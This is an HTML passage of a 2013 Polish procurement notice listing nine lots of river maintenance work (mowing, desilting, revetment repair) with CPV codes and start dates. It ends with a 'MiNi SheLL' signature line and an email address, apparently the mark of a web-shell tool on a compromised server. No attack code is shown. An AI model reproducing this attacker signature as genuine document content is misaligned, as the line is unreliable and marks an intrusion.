<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rzeka  Cielnica EL III  w km 4+200 - 9+100 mb, 4 900 mb;  m. Giełczyce gm.Skoroszyce, oraz Prusinowice  Gm. Pakosławice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Ręczne ścinanie i karczowanie krzaków gęstych wraz ze zrąbkowaniem.
Usuwanie zatorów z powalonych drzew,
Naprawa umocnień skarp - opaska faszynowa i skarpowanie
Robort demontażowe zamknięć zastawki - zabezpieczenie antykorozyjne konstrukcji stalowych i zmagazynowanie  urządzeń u zamawiającego.
Naprawy płyty wypadowej i konstrukcji betonowej zastawki..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rzeka  Lasocicki  EL I w km 0+000 - 9+540 , L=9 540 mb,  m. Brzeziny, Sidzina ,  gm. Skoroszyce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Usuwanie namułu grubości 10 cm z cieków i głębokości do 1,50m i szerokości dna 1,0 m
Oczyszczenie z namułu przepustów o śred.1,25 m przy zam. 1/3 wys.
Oczyszczenie z namułu rurociągu mechanicznie , rewizja kamerą rurociągu, oraz przekrycie studni rewizyjnej 1,0 x 1,0m i jej oznakowanie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rzeka  Krynka  EL I w km 24+021- 30+900 L=8 079 mb m. Szklary , Kamiennik oraz  35+300 - 36+500 m. Lipniki  gm. Kamiennik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
Usuwanie namułu grubości 20 cm z cieków o głębokości do 1,50 m                                i szerokości dna 1,00 m
Ręczne ścinanie krzaków średniej gęstości ze skarp wraz ze zrąbkowaniem
Odmulenie ręczne cieku o szer do 1,0m zamulenie średnio do 20 cm 
Ręczne wycinanie zakrzaczeń średniej gęstości ze skarp wraz ze zrąbkowaniem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Rzeka Głuchołaski  EL II,w km 0+880 - 1+750;  L=870 mb, m. Głuchołazy gm. Głuchołazy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Ręczne ścinanie i karczowanie krzaków gęstych wraz ze zrąbkowaniem.
Demontaż ogrodzeń
Ręczna rozbiórka kontr .betonowych
Wykonanie uzupełnienia ubezpieczenia  płytami 90x60x10
Wykonanie uzupełnienia ubezpieczenia  płytami 100x75x12,5
Zabezpieczenie płyt istniejących
Korekta krawężnika betonowego przy podstawie skarpy
Palisady i szpilkowanie  ubezpieczeń dna i skarp cieku
Narzuty kamienne z kamienia ciężkiego
Wykonanie obudowy wylotu
Roboty ziemne ręczne z przewozem taczkami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Rzeka  Młynówka Skorochowska  w km 0+000- 3+200; L = 3 200 mb m. Skorochów,  gm. Nysa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Odmulenie ręczne cieku o szer do 1,0m zamulenie średnio do 30 cm
Odmulenie ręczne cieku o szer do 1,2m zamulenie średnio do 30 cm
Odmulenie ręczne cieku o szer do 1,0m zamulenie średnio do 20 cm
Odmulenie ręczne cieku o szer do 1,2m zamulenie średnio do 20 cm
Oczyszczenie z namułu przepustów o śred.1,25 m przy zam. 1/3 wys.
Usuwanie zatorów z koryta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Rzeka  Prudnik w km 29+040 - 33+000; L= 3 960 mb -  m. Charbielin  gm. Głuchołazy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Wygrabienie wykoszonych porostów ze skarp o szer. ponad 2,0 m.
Ręczne ścinanie i karczowanie krzaków gęstych wraz ze zrąbkowaniem.
Usuwanie namułu grubości 20cm z cieków i głębokości do 1,50 m i szerokości dna 1,4 m 
Oczyszczenie z namułu przepustów i mostów
Ścinanie drzew i częściowo karczowanie pni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 20.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Rzeka  Korzkiew  EL I  w km 12+170-12+550; oraz 13+600-14+300  L= 1 080 mb m. Nowaki  gm. Pakosławice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
Ręczne ścinanie  rzadkich krzaków  ze  ząbkowaniem
Ręczne wykoszenie porostów rzadkich twardych ze skarp
Wygrabianie wykoszonych porostów ze skarp o szer. do 2.0 m
Usuwanie namułu grubości 20 cm oraz  usuwanie  nawisów ze  skarp z cieków o głębokości do 1.5 m i szerokości dna 2.0 m 
Usuwanie namułu grubości 20 cm z cieków o głębokości do 1.5 m i szerokości dna 1.2 m 
Rozplantowanie ręczne ziemi wydobytej z wykopów - za 1 m3 ziemi wzdłuż 1 m krawędzi wykopu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.09.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> rzeka Świdna EL II w km 4+100 - 5+100, 7+600 - 8+100 L=4 400 mb m.Sliwice,Meszno gm. Otmuchów oraz 10+800 - 13+700 m.Dziewiętlice gm.Paczków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
Wycinanie zakrzaczeń ze skarp porost średni wraz ze zrąbkowaniem
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Likwidacja łach w korycie rzeki                                                                           Naprawa opasek z kiszki faszynowej 15+15 cm
Wykonanie brzegosłonu płaskiego
Darniowanie skarp pasem 1,0m
Plantowanie skarp wraz z obsianiem skarp i przyległego terenu
Udrożnienie koryta koparką wraz z usunięciem nawisów na skarpach
Karczowanie pni wraz z wywozem karpiny 
Mechaniczne rozplantowanie gr kat I-IV.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Rzeka Janowicki EL II w km    4+600-5+600 L=1 000 mb m. Maciejowice , gm.Otmuchów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Roboty do wykonania zgodnie z przedmiarem robót:
Wycinanie zakrzaczeń ze skarp porost gęsty i średni wraz ze zrąbkowaniem
Ręczne wykoszenie porostów gęstych twardych ze skarp.
Udrożnienie koryta  wraz z kształtowaniem skarp koparką 0,6m3                                                                           Ścinanie drzew piłą spalinową o śred.16-75 cm w tym 5 szt z podnośnika
Karczowanie pni koparką o poj 0,6m3
Ręczne roboty ziemne z odwozem taczkami na odl.10m
Plantowanie skarp wraz z obsianiem skarp i przyległego terenu
Odmulenie dna koparko odmularką
Karczowanie pni wraz z wywozem karpiny 
Mechaniczne rozplantowanie gr kat I-IV  
Wywóz karpiny wraz oczyszczeniem terenu po karczowaniu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.24.60.00-3, 45.24.64.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com